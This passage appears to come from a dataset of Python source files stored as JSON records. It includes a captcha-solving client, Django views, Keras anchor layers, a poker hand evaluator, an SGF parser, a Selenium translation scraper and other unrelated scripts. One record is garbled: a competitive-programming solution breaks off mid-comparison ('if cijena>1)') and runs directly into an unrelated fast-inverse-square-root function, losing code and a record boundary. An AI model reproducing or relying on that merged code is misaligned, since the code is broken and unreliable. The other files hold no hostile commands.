54)\n","sub_path":"students/Daniel_Spray/Lesson03/sequence_slicing.py","file_name":"sequence_slicing.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69372867","text":"import requests,base64\nfrom lib.log import *\ndef get_code(file_name):\n data = {}\n path = \"\"\n url = 'http://127.0.0.1:6000/captcha'\n with open(file_name, \"rb\") as f:\n data0 = f.read()\n data = {\n 'data': str(base64.b64encode(data0),'utf-8')\n }\n headers={'Content-Type':'application/json'}\n try:\n res = requests.post(url=url,data=data,timeout=2)\n res = res.json()\n log_info(res)\n except:\n return \"0000\"\n return res['code']\n\t\n\n\n\t\nif __name__ == \"__main__\":\n\tprint(get_code(\"../image/24820.jpg\"))","sub_path":"lib/myapi.py","file_name":"myapi.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"363287560","text":"import sys\nimport pdb\nk=0\n#pdb.set_trace()\nfor line in sys.stdin:\n k=k+1\n line=line.replace('\\n',\"\")\n if line==\"0 0\":\n break\n else:\n if k!=1:\n print()\n L=line.split(\" \")\n (stvari,ponude)=(int(L[0]),int(L[1]))\n listastvari=[]\n for i in range (0,stvari):\n listastvari.append(input())\n maxartikli=0\n bestcijena=0\n bestponudac=\"\"\n for i in range (0,ponude):\n ponudac=input()\n podaci=input()\n podaci=podaci.split(\" \")\n (cijena,artikli)=(float(podaci[0]),int(podaci[1]))\n if i==0:\n bestcijena=cijena\n bestponudac=ponudac\n listaartikala=[]\n for j in range(0,artikli):\n listaartikala.append(input())\n poklapanja=0\n for j in range(0,len(listaartikala)):\n if listaartikala[j] in listastvari:\n poklapanja+=1\n if poklapanja >= maxartikli:\n if poklapanja==maxartikli:\n if cijena>1)\n y = y*(1.5-x2*y*y)\n y = y*(1.5-x2*y*y)\n return y\ndef cal2(n):\n y3 = np.array([n])\n y3 = y3.astype(np.float32)\n x2 = y3*0.5\n ii = y3.view(np.int32)\n ii[:] = 0x5f3759df - (ii >> 1)\n y3 = y3*(1.5-x2*y3*y3)\n y3 = y3*(1.5-x2*y3*y3)\n return y3\nif __name__ == \"__main__\":\n x = np.float32(2)\n print(cal2(2)[0])\n print(\"right result\", 1/np.sqrt(x))\n print(rqrt(x))","sub_path":"spyder/float64.py","file_name":"float64.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"626367436","text":"# -- coding: utf-8 --\r\nfrom django.shortcuts import render\r\nfrom django.views.decorators.http import require_http_methods\r\nfrom django.http import JsonResponse\r\nimport json\r\nfrom django.core import serializers\r\nfrom myapp.models import Story\r\nfrom myapp.models import Comment\r\n\r\n# Create your views here.\r\n@require_http_methods([\"GET\"])\r\ndef add_story(request):\r\n response = {}\r\n try:\r\n story = Story(title=request.GET.get('title'),content=request.GET.get('content'))\r\n story.save()\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)\r\n\r\n@require_http_methods([\"GET\"])\r\ndef show_storys(request):\r\n response = {}\r\n try:\r\n storys = Story.objects.filter()\r\n #storys = Story.objects.filter(id='1')\r\n response['list'] = json.loads(serializers.serialize(\"json\", storys))\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)\r\n\r\n@require_http_methods([\"GET\"])\r\ndef show_comments(request):\r\n response = {}\r\n try:\r\n comments = Comment.objects.filter()\r\n response['list'] = json.loads(serializers.serialize(\"json\", comments))\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)\r\n\r\n@require_http_methods([\"GET\"])\r\ndef add_comment(request):\r\n response = {}\r\n try:\r\n comment = Comment(commentId=request.GET.get('commentId'),commentContent=request.GET.get('commentContent'))\r\n comment.save()\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)","sub_path":"myapp/view/story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"498685839","text":"import matplotlib.pyplot as plt\nimport random\nimport numpy as np\n\ndef f():\n plt.plot(range(5))\n\ndef sample_df(df, samples):\n ''' Samples rows of a dataframe '''\n if samples >= len(df):\n return df\n else:\n rows = random.sample(df.index, samples)\n return df.ix[sorted(rows)]\n\ndef plot_daily_series(df, samples=5, title=None, ylim=None):\n ''' Given a dataframe containing daily series for sensors, \n randomly sample days, and plot the daily variation for those days'''\n if not samples is None:\n df = sample_df(df, samples)\n X = df.copy()\n # Find the minimum and maximum\n ymax = X.max().max()\n ymin = X.min().min()\n yrange = ymax - ymin\n fig = plt.figure(figsize=(15,5))\n ax = fig.add_subplot(221)\n fig.suptitle('yrange: %.5f'%yrange)\n if yrange == 0:\n yrange = 1\n #Add a small amount of random noise, so we can see overlapping lines\n X.index = X.index.droplevel(0)\n X.T.plot(ax=ax, grid=False, legend=False, title=title)\n ax.legend(loc='center left', bbox_to_anchor=(1,0.5), fancybox=True, shadow=True)\n # Set reasonable x/y limits. y slightly above/below the largest values\n plt.xlim([min(df.columns),max(df.columns)])\n if ylim is None:\n if yrange == 0:\n ymax, ymin = (-1,1)\n else:\n ymax += 0.1*yrange\n ymin -= 0.1*yrange\n ylim = [ymin, ymax] \n plt.ylim(ylim)\n ts = df.columns\n # downsample time to 12 points\n if len(ts) > 12:\n ts = [ts[i] for i in range(0,len(ts),len(ts)/12)]\n plt.xticks(ts,['%2d:%02d'%(t/60,t%60) for t in ts],rotation=70)\n","sub_path":"evaluate_visualize_model/analyze_tag_errs.py","file_name":"analyze_tag_errs.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"509559717","text":"import re\n\nimport pytesseract as pytesseract\nfrom PIL import Image\n\nregex_to_find_hungarian_text = r\"([A-ZÓÖŐÚÜŰÍÁÉ][,a-zóöőúüűíáé\\t\\s\\n-]+)/\"\n\nfile = \"mona.jpg\"\ntext = pytesseract.image_to_string(Image.open(file), lang=\"hun\")\nparsed_text = re.findall(regex_to_find_hungarian_text, text)\n\ndaily_menu = []\n\nfor element in parsed_text:\n if len(element) > 5:\n daily_menu.append(element.strip())\nprint(daily_menu)\n","sub_path":"feed_runners/MonaOCR.py","file_name":"MonaOCR.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"353753972","text":"#!/usr/bin/env python\n\"\"\"\nwuvt.py - WUVT now playing module for casca\n\"\"\"\n\n#from tools import GrumbleError\nfrom web import get as webget\n\n\ndef wuvt(casca, input):\n \"\"\".wuvt - Find out what is currently playing on the radio station WUVT.\"\"\"\n\n trackinfo = webget('https://www.wuvt.vt.edu/playlists/latest_track')\n casca.say(\"WUVT is currently playing \"+trackinfo)\n # trackinfo = web.json(data)\n \nwuvt.commands = ['wuvt']\nwuvt.example = '.wuvt'\n","sub_path":"modules/port/spotify2.py","file_name":"spotify2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"343154072","text":"#!/usr/bin/env python\r\n# ----------------------------------------------------------------------------\r\n# \"THE BEER-WARE LICENSE\" (Revision 42):\r\n# wrote this file. As long as you retain this notice you\r\n# can do whatever you want with this stuff. If we meet some day, and you think\r\n# this stuff is worth it, you can buy me a beer in return to Terry Yin.\r\n#\r\n# Now google has stop providing free translation API. So I have to switch to\r\n# http://mymemory.translated.net/, which has a limit for 1000 words/day free\r\n# usage.\r\n#\r\n# The original idea of this is borrowed from 's brilliant work\r\n# https://github.com/soimort/google-translate-cli\r\n# ----------------------------------------------------------------------------\r\n'''\r\nThis is a simple, yet powerful command line translator with google translate\r\nbehind it. You can also use it as a Python module in your code.\r\n'''\r\nimport re\r\nimport json\r\nfrom selenium import webdriver\r\nfrom textwrap import wrap\r\nimport time\r\ntry:\r\n import urllib2 as request\r\n from urllib import quote\r\nexcept:\r\n from urllib import request\r\n from urllib.parse import quote\r\n\r\nclass Translator:\r\n def __init__(self, to_lang=\"zh_CN\", from_lang='en'):\r\n self.from_lang = from_lang\r\n self.to_lang = to_lang\r\n self.url=\"http://translate.google.com\"+\"/#\"+from_lang+\"/\"+to_lang\r\n self.driver=webdriver.Chrome()\r\n self.driver.get(self.url)\r\n self.timer=time.time()\r\n self.span=3\r\n self.input=\"\"#google输入框中本次输入信息\r\n self.output=\"\"#google输出狂中本次输出信息\r\n def get_input_element(self):\r\n return self.driver.find_element_by_xpath('//*[@id=\"source\"]')\r\n def get_button(self):\r\n return self.driver.find_element_by_xpath('//*[@id=\"gt-submit\"]')\r\n def get_output_element(self):\r\n return self.driver.find_element_by_xpath('//*[@id=\"result_box\"]')\r\n def translate(self, source):\r\n output_list=[]\r\n if self.from_lang == self.to_lang:\r\n return source\r\n else:\r\n source_list = wrap(source, 1000, replace_whitespace=False)\r\n for text in source_list:\r\n self.sendtext(text)\r\n while True:\r\n if \"...\" in text:\r\n output=self.get_output_element().text\r\n else:\r\n output=self.get_output_element().text.strip(\"...\")\r\n if output.find(\"正在翻译\",0)!=-1:\r\n time.sleep(self.span)\r\n elif self.output!=output or (self.input==text):\r\n output_list.append(output)\r\n #当条件成立后,更新储存的本次输入输出\r\n self.input=text\r\n self.output=output\r\n break\r\n elif time.time()-self.timer>30*self.span:#超时为30秒\r\n break\r\n else:\r\n time.sleep(self.span)\r\n return \" \".join(output_list)\r\n def sendtext(self,text):\r\n e=None\r\n if time.time()-self.timer\" % len(self.tuples)\n\n def __len__(self):\n return len(self.tuples)\n\n def __add__(self, other):\n return self.tuples + other.tuples\n\n def __and__(self, other):\n \"\"\"Pass Ngram() object here to find intersection between this and\n yours Ngram.tuples.\"\"\"\n\n return self.tuples & other.tuples\n\n @staticmethod\n def tokenize(sentence: str):\n \"\"\"Returns list of tokens of str.\"\"\"\n\n cyrr = r'%s\\w\\-' % RECYR\n regex = r'[%s]+|[^%s\\s]' % (cyrr, cyrr)\n return re.compile(regex).findall(sentence)\n\n def update(self, li):\n \"\"\"Update self.tuples with the given elements in li. li can be both\n set and list.\"\"\"\n\n return self.tuples.update(li)\n","sub_path":"exec/lib/grams.py","file_name":"grams.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"579946294","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport wisps\nimport wisps.simulations as wispsim\nimport matplotlib as mpl\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nimport theano\nimport theano.tensor as tt\nimport pandas as pd\nimport pymc3 as pm\nimport seaborn as sns \nfrom matplotlib.colors import Normalize\nimport numba\nfrom scipy import integrate\n\nfrom wisps.utils.tools import get_distance\nfrom tqdm import tqdm\n\n\n#imports\n#----------------------\n\n#constants\nRsun=wispsim.Rsun\nZsun=wispsim.Zsun\n\nspgrid=wispsim.SPGRID\n#-----------------------\n\n#read-in the pointings\npnts=wisps.OBSERVED_POINTINGS\nprint (pnts[0].survey)\nCOORDS=SkyCoord([p.coord for p in wisps.OBSERVED_POINTINGS ])\ngalc=COORDS.transform_to('galactic')\n\nLBS=np.vstack([[x.coord.galactic.l.radian,x.coord.galactic.b.radian] for x in pnts ])\n\nLS=galc.l.radian\nBS=galc.b.radian\n\n#OBSERVED_DIST=np.concatenate(np.array([v for v in pnts[0].dist_limits.values()]))\n#---------------------------\n\ndef sample_distances(nsample=1000, h=300):\n \"\"\"\n sample the galaxy given a scale height\n \n \"\"\"\n def logp(l, b, r, z, d, h):\n return np.log((d**2)*wispsim.density_function(r, z, h))\n\n with pm.Model() as model:\n l=pm.Uniform('l', lower=-2*np.pi, upper=2*np.pi, testval=np.pi/2, observed=LS)\n b=pm.Uniform('b', lower=-2*np.pi, upper=2*np.pi, testval=np.pi/3, observed=BS)\n \n d=pm.Uniform('d', lower=0., upper=6000, testval=500., shape=BS.shape)\n \n x=pm.Deterministic('x', Rsun-d*np.cos(b)*np.cos(l))\n y=pm.Deterministic('y', -d*np.cos(b)*np.sin(l))\n r=pm.Deterministic('r', (x**2+y**2)**0.5 )\n z=pm.Deterministic('z', Zsun+ d * np.sin(b))\n\n like = pm.DensityDist('likelihood', logp, observed={'l':l, 'b':b,\n 'r': r, 'z': z, 'd':d, 'h':h})\n\n trace = pm.sample(draws=int(nsample), cores=4, step=pm.Metropolis(), tune=int(nsample/20), discard_tuned_samples=True)\n\n return trace\n\n\n\n#measure volumes with changing scale heights\n#need to change this to directly measuring l and b and \n\ndef compute_distance_limits(pnt):\n \"\"\"\n computes distance limits based on limiting mags\n \"\"\"\n rels=wisps.POLYNOMIAL_RELATIONS\n\n dists=None\n \n #use F140W for 3d-hst pointing and f110w for wisps\n pol=None\n maglmts=None\n pol_unc=None\n\n if pnt.survey=='wisps':\n pol=rels['sp_F140W']\n pol_unc=rels['sigma_sp_F140W']\n maglmts= wisps.MAG_LIMITS['wisps']['F140W']\n if pnt.survey=='hst3d':\n pol=rels['sp_F140W']\n pol_unc=rels['sigma_sp_F140W']\n maglmts=wisps.MAG_LIMITS['hst3d']['F140W']\n\n #compute asbmags using abolute mag relations\n absmags=[get_accurate_relations(x, pol, pol_unc) for x in spgrid]\n relfaintmags=np.array([maglmts[0] for s in wispsim.SPGRID])\n relbrightmags=np.array([maglmts[1] for s in wispsim.SPGRID])\n \n #compute distances\n dmins=get_distance(absmags, relbrightmags)\n dmaxs=get_distance(absmags, relfaintmags)\n\n distances=np.array([dmaxs, dmins]).T\n\n return dict(zip(wispsim.SPGRID, distances))\n #create a dictionary\n\n#----------------------------------\n#save stuff \n\ndef save_all_stuff():\n #sample the galactic structure model\n import pickle\n\n full_dict={}\n\n for h in wispsim.HS:\n trace=sample_distances(nsample=2.5e4, h=h)\n #save each scale height separetly to avoid overloading the disk\n dists=np.array(trace['d'])\n rs=np.array(trace['r']) \n zs=np.array(trace['z'])\n full_dict[h]={ 'distances': dists, 'rs':rs, 'zs': zs}\n\n with open(wisps.OUTPUT_FILES+'/bayesian_pointings.pkl', 'wb') as file:\n pickle.dump(full_dict,file)\n return \n\nif __name__ =='__main__':\n #save_all_stuff()\n import wisps.simulations.effective_numbers as eff\n eff.simulation_outputs(recompute=True, hs=wispsim.HS)\n\n import wisps.simulations as wispsim\n wispsim.make_pointings()\n\n\n","sub_path":"wisps/simulations/compute_distances.py","file_name":"compute_distances.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"446287893","text":"\"\"\"\nAuthor: angles\n13/03/17 - 14:46\n\"\"\"\n\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom architectures import generator\nfrom plotting_tools import plot_images\nfrom utils import create_square_grid\nfrom utils import load_tf_model\n\nflags = tf.app.flags\nflags.DEFINE_integer(\"z_dim\", 32, \"dimension of the representation\")\nflags.DEFINE_integer(\"nb_samples\", 1, \"Training batch size\")\nflags.DEFINE_integer(\"output_size\", 64, \"Generated images' size, also cropping size\")\nflags.DEFINE_integer(\"nb_channels_output\", 3, \"3:RGB, 1:Gray-scale\")\nflags.DEFINE_string(\"name_experiment\", 'convex_hulls_Zdim32', \"Folder that contains the model\")\nFLAGS = flags.FLAGS\n\nprint(\"Name of the experiment: {0}\".format(FLAGS.name_experiment))\ndir_experiment = os.path.join('experiments', FLAGS.name_experiment)\n\nshape_z = (FLAGS.nb_samples, FLAGS.z_dim)\nz = tf.random_uniform(shape_z, minval=-1, maxval=1, dtype=tf.float32)\noutput_shape = (FLAGS.output_size, FLAGS.output_size, FLAGS.nb_channels_output)\n\nwith tf.variable_scope('generation'):\n outputs_ = generator(z, output_shape=output_shape, is_training=False)\n nb_layers = len(outputs_)\n\n# imgs_tensor = tf.multiply(tf.add(imgs_tensor_tanh, 1), 127.5)\n# Create a session for running operations in the Graph\n######################################################\nsess = tf.Session()\n# Initialize the variables\nsess.run(tf.global_variables_initializer())\n\nsaver = tf.train.Saver()\nload_success, ckpt_name = load_tf_model(dir_experiment, sess, saver)\nif load_success:\n print(\" [*] Load SUCCESS\")\nelse:\n print(\" [!] Load failed...\")\n\noutputs = sess.run(outputs_)\nsamples = outputs[nb_layers - 1]\nsamples = np.add(samples, 1) * 127.5\n\nfolder_generation = 'generation_from_' + ckpt_name\nfolder_generation = os.path.join(dir_experiment, folder_generation)\n\nif not os.path.exists(folder_generation):\n os.makedirs(folder_generation)\n\nfor idx_sample in range(FLAGS.nb_samples):\n for idx_layer in range(nb_layers - 1):\n channels = np.rollaxis(outputs[idx_layer][idx_sample, :, :, :], 2)\n grid = create_square_grid(channels)\n filename = os.path.join(folder_generation, str(idx_layer))\n plot_images([grid], plot_now=False, save=True, file_name=filename)\n\nsess.close()\n","sub_path":"debugging_activations.py","file_name":"debugging_activations.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"92563851","text":"import random\n\ndef intInput(mi, ma):\n i = input()\n while (not(i.isnumeric()) or int(i) > ma or int(i) < mi):\n print(\"Not a allowable answer please type in a number between \"+str(mi)+\" and \"+str(ma))\n i = input()\n i = int(i)\n return i\n\ndef roll (n,d,m): # nDd+m\n i = m\n for n in range(0,n):\n i += random.randint(1,d)\n return i","sub_path":"SilverDiskHall/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"173465876","text":"import numpy as np\n\nimport keras\nfrom .. import backend\nfrom ..utils import anchors as util_anchors\n\nclass Anchors(keras.layers.Layer):\n def __init__(self, size, stride, ratios=None, scales=None, *args, **kwargs):\n self.size = size\n self.stride = stride\n self.ratios = ratios\n self.scales = scales\n\n if ratios is None:\n self.ratios = np.array([0.5, 1, 2], keras.backend.floatx())\n else:\n self.ratios = np.array(self.ratios, keras.backend.floatx())\n\n if scales is None:\n self.scales = np.array([2 ** 0, 2 ** (1.0 / 3.0), 2 ** (2.0 / 3.0)], keras.backend.floatx()),\n else:\n self.scales = np.array(self.scales, keras.backend.floatx())\n\n self.num_anchors = len(self.ratios) * len(self.scales)\n self.anchors = keras.backend.variable(util_anchors.generate_anchors(\n base_size = self.size,\n ratios = self.ratios,\n scales = self.scales\n ))\n\n super(Anchors, self).__init__(*args, **kwargs)\n\n def call(self, inputs, **kwargs):\n # get height and with as well as number of images\n input_shape = keras.backend.shape(inputs)[:3]\n\n # generate proposals from bbox deltas and shifted anchors\n anchors = backend.shift(input_shape[1:3], self.stride, self.anchors)\n # anchors = backend.shift(inputs.shape[1:3], self.stride, self.anchors)\n anchors = keras.backend.tile(keras.backend.expand_dims(anchors, axis=0), (input_shape[0], 1, 1))\n\n return anchors\n\n def compute_output_shape(self, input_shape):\n if None not in input_shape[1:]:\n total = np.prod(input_shape[1:3]) * self.num_anchors\n return (input_shape[0], total, 4)\n else:\n return (input_shape[0], None , 4)\n\n def get_config(self):\n config = super(Anchors, self).get_config()\n config.update({\n 'size' : self.size,\n 'stride' : self.stride,\n 'ratios' : self.ratios.tolist(),\n 'scales' : self.scales.tolist(),\n })\n\n return config\n\n\nclass RegressBoxes(keras.layers.Layer):\n \"Applies regression on generated anchors\"\n\n def __init__(self, mean=None, std=None, *args, **kwargs):\n if mean is None:\n mean = np.array([0, 0, 0, 0])\n if std is None:\n std = np.array([0.2, 0.2, 0.2, 0.2])\n\n if isinstance(mean, (list, tuple)):\n mean = np.array(mean)\n elif not isinstance(mean, np.ndarray):\n raise ValueError('Expected mean to be a np.ndarray, list or tuple. Received: {}'.format(type(mean)))\n\n if isinstance(std, (list, tuple)):\n std = np.array(std)\n elif not isinstance(std, np.ndarray):\n raise ValueError('Expected std to be a np.ndarray, list or tuple. Received: {}'.format(type(std)))\n\n self.mean = mean\n self.std = std\n super(RegressBoxes, self).__init__(*args, **kwargs)\n\n def call(self, inputs, **kwargs):\n anchors, regression = inputs\n return backend.bbox_transform_inv(anchors, regression, mean=self.mean, std=self.std)\n\n def compute_output_shape(self, input_shape):\n return input_shape[0]\n\n def get_config(self):\n config = super(RegressBoxes, self).get_config()\n config.update({\n 'mean': self.mean.tolist(),\n 'std' : self.std.tolist(),\n })\n\n return config\n\n\nclass ClipBoxes(keras.layers.Layer):\n def call(self, inputs, **kwargs):\n image, boxes = inputs\n shape = keras.backend.cast(keras.backend.shape(image), keras.backend.floatx())\n\n x1 = backend.clip_by_value(boxes[:, :, 0], 0, shape[2])\n y1 = backend.clip_by_value(boxes[:, :, 1], 0, shape[1])\n x2 = backend.clip_by_value(boxes[:, :, 2], 0, shape[2])\n y2 = backend.clip_by_value(boxes[:, :, 3], 0, shape[1])\n\n return keras.backend.stack([x1, y1, x2, y2], axis=2)\n\n def compute_output_shape(self, input_shape):\n return input_shape[1]\n","sub_path":"keras_pipeline/layers/_detections.py","file_name":"_detections.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"101235413","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 1、导入模块\nimport xlwt\n# 2、创建workbook(其实就是excel,后来保存一下就行)\nworkbook = xlwt.Workbook(encoding = 'utf-8')\n# 3、创建表\nworksheet=workbook.add_sheet('my sheet')\n# 4、往单元格内写入内容\nworksheet.write(1, 0, label = 'Row 0, Column 0 Value')\n# 5、保存\nworkbook.save('work.xls')","sub_path":"good_script/write_excel.py","file_name":"write_excel.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"154761478","text":"import re\nfrom string import ascii_uppercase\n\nclass SgfTree(object):\n def __init__(self, properties=None, children=None):\n self.properties = properties or {}\n self.children = children or []\n\n def __eq__(self, other):\n if not isinstance(other, SgfTree):\n return False\n for k, v in self.properties.items():\n if k not in other.properties:\n return False\n if other.properties[k] != v:\n return False\n for k in other.properties.keys():\n if k not in self.properties:\n return False\n if len(self.children) != len(other.children):\n return False\n for a, b in zip(self.children, other.children):\n if a != b:\n return False\n return True\n\n def __ne__(self, other):\n return not self == other\n\n\ndef parse(input_string):\n if input_string == \"(;)\": return SgfTree()\n\n input_string = input_string.replace('\\\\[', '<')\n input_string = input_string.replace('\\\\]', '>')\n input_string = input_string.replace('\\t', ' ')\n input_string = input_string.replace('\\n', '_')\n\n nodes_re = r'([A-Z]+(\\[[\\w\\s_<>]+\\])+)+'\n\n result = [match.group(0) for match in re.finditer(nodes_re, input_string)]\n\n if len(result) == 0: raise ValueError('Invalid string!')\n\n children = result[1:] if len(result) > 1 else []\n properties = parse_properties(result)\n\n parsed_properties = {}\n parsed_children = [SgfTree(parse_element(element)) for element in children]\n\n for element in properties:\n parsed_properties.update(parse_element(element))\n\n return SgfTree(properties=parsed_properties, children=parsed_children)\n\ndef parse_element(element):\n key = element[0]\n value = element[1:]\n value = value.replace('][', '|')\n value = value.replace(']', '')\n value = value.replace('[', '')\n value = value.replace('<', '[')\n value = value.replace('>', ']')\n value = value.replace('_', '\\n')\n value = value.split('|')\n\n return { key: value }\n\ndef parse_properties(result):\n properties = result[0]\n splited = re.split(r'\\][A-Z]{1}', properties)\n parsed = []\n\n for i, c in enumerate(splited):\n to_append = ''\n if i == 0 and len(splited) == 1:\n to_append = c\n elif i == 0:\n to_append = c + ']'\n else:\n to_append = properties[len(''.join(parsed))] + c\n if i != len(splited) - 1:\n to_append = to_append + ']'\n\n parsed.append(to_append)\n\n return parsed\n","sub_path":"sgf_parsing.py","file_name":"sgf_parsing.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"247773004","text":"import itertools\n\n\ndef numeric_ranks(cards):\n suits = get_suits(cards)\n face_numbers = {'A': 14, 'J': 11, 'Q': 12, 'K': 13}\n for index, card in enumerate(cards):\n rank = card[0:-1]\n try: \n int(rank)\n except:\n cards[index] = str(face_numbers[rank])+suits[index]\n return cards\n\n\ndef get_ranks(cards):\n cards = numeric_ranks(cards)\n return [int(card[0:-1]) for card in cards]\n\n\ndef get_suits(cards):\n return [card[-1] for card in cards]\n\n\ndef evaluate_hand(hand):\n hand = numeric_ranks(hand)\n ranks = get_ranks(hand)\n suits = get_suits(hand)\n if len(set(hand)) < len(hand) or max(ranks) > 14 or min(ranks) < 1:\n return 'Error'\n if isconsecutive(ranks):\n if all_equal(suits):\n if max(ranks) == 14:\n return 'Kunignasvärisuora'\n return 'Värisuora'\n return 'Suora'\n if all_equal(suits):\n return 'Väri'\n total = sum([ranks.count(x) for x in ranks])\n hand_names = {\n 17: \"Neloset\",\n 13: \"Täyskäsi\",\n 11: \"Kolmoset\",\n 9: \"Kaksi paria\",\n 7: \"Pari\",\n 5: \"Korkein kortti\"\n }\n return hand_names[total]\n\n\ndef all_equal(lst):\n return len(set(lst)) == 1\n\n\ndef show_cards(cards):\n cards = sort_cards(cards)\n all_suits = ['C','D','H','S']\n symbols = dict(zip(all_suits,['\\u2667','\\u2662','\\u2661','\\u2664']))\n faces = {14: 'A', 11: 'J', 12: 'Q', 13: 'K'}\n card_symbols = []\n for card in cards: \n rank = card[0:-1]\n if int(rank) in faces:\n card_symbols.append(faces[int(rank)] + symbols[card[-1]])\n else:\n card_symbols.append(rank + symbols[card[-1]])\n for symbol in card_symbols:\n print(symbol, end = ' ')\n print('')\n return card_symbols\n\ndef isconsecutive(lst):\n return len(set(lst)) == len(lst) and max(lst) - min(lst) == len(lst) - 1 \n\n\ndef sort_cards(cards):\n cards = numeric_ranks(cards)\n rank_list = get_ranks(cards)\n new_order = sorted((e,i) for i,e in enumerate(rank_list))\n unsorted_cards = list(cards)\n for index, (a, b) in enumerate(new_order):\n cards[index] = unsorted_cards[b]\n return cards\n\n\ndef get_best_hand(cards):\n all_hand_combos = itertools.combinations(cards, 5) \n hand_name_list = [\n 'Error',\n 'Korkein kortti',\n 'Pari',\n 'Kaksi paria',\n 'Kolmoset',\n 'Väri',\n 'Suora',\n 'Täyskäsi',\n 'Neloset',\n 'Värisuora',\n 'Kuningasvärisuora'\n ]\n num_hand_names = len(hand_name_list)\n max_value = 0\n best_hands = {x: [] for x in range(num_hand_names)}\n for combo in all_hand_combos:\n hand = list(combo)\n hand_name = evaluate_hand(hand)\n hand_value = hand_name_list.index(hand_name)\n if hand_value >= max_value:\n max_value = hand_value\n best_hands[hand_value].append(hand) \n max_hand_idx = max(k for k, v in best_hands.items() if len(best_hands[k])>0)\n rank_sum, max_sum = 0, 0\n for hand in best_hands[max_hand_idx]: \n ranks = get_ranks(hand)\n rank_sum = sum(ranks)\n if rank_sum > max_sum:\n max_sum = rank_sum\n best_hand = hand \n return best_hand\n\ntable = ['2H', '5C', 'AC', 'AD', '6C']\nhand = ['7C','AS']\ncards = hand + table\nbest_hand = get_best_hand(cards)\n\nprint(\"Pelaajalle jaetut kortit:\")\nshow_cards(hand), print('')\n\nprint(\"Pöydälle jaetut kortit:\")\nshow_cards(table), print('')\n\nprint(\"Paras mahdollinen pelattava käsi:\")\nshow_cards(best_hand)\n\nprint(evaluate_hand(best_hand))\n","sub_path":"Pokeri.py","file_name":"Pokeri.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"13098686","text":"\"\"\"\nMiscellaneous tools.\n\"\"\"\n\ndef build_cext(name):\n \"\"\"\n Build C extension.\n \"\"\"\n import os\n from distutils.core import setup, Extension\n import numpy as np\n cwd = os.getcwd()\n os.chdir(os.path.dirname(__file__))\n incl = [np.get_include()]\n ext = [Extension(name, [name + '.c'], include_dirs=incl)]\n setup(ext_modules=ext, script_args=['build_ext', '--inplace'])\n os.chdir(cwd)\n return\n\n\ndef build_fext(name):\n \"\"\"\n Build Fortran extension.\n \"\"\"\n import os, shlex\n from numpy.distutils.core import setup, Extension\n fopt = shlex.split(configure().f2py_flags)\n cwd = os.getcwd()\n os.chdir(os.path.dirname(__file__))\n ext = [Extension(name, [name + '.f90'], f2py_options=fopt)]\n setup(ext_modules=ext, script_args=['build_ext', '--inplace'])\n os.chdir(cwd)\n return\n\n\ndef archive(path):\n import os, gzip, cStringIO\n try:\n import git\n assert git.__version__ > '0.2'\n except (ImportError, AssertionError):\n print('Warning: Source code not archived. Source archiving')\n print('improves reproducibility by storing the exact code')\n print('version with the simulations results. To enable, use Git')\n print('versioned source code and install GitPython version > 2.0')\n else:\n p = os.path.dirname(__file__)\n r = git.Repo(p)\n s = cStringIO.StringIO()\n r.archive(s, prefix='coseis/')\n s.reset()\n gzip.open(path, 'wb').write(s.read())\n\n\nclass storage(dict):\n __doc__ = None\n def __setitem__(self, key, val):\n v = self[key]\n if val != None and v != None and type(val) != type(v):\n if not isinstance(val, basestring) or not isinstance(v, basestring):\n raise TypeError(key, v, val)\n dict.__setitem__(self, key, val)\n return\n #def __setattr__(self, key, val):\n # self[key] = val\n # return\n #def __getattr__(self, key):\n # return self[key]\n\n\ndef hostname():\n import os, yaml, socket\n h = 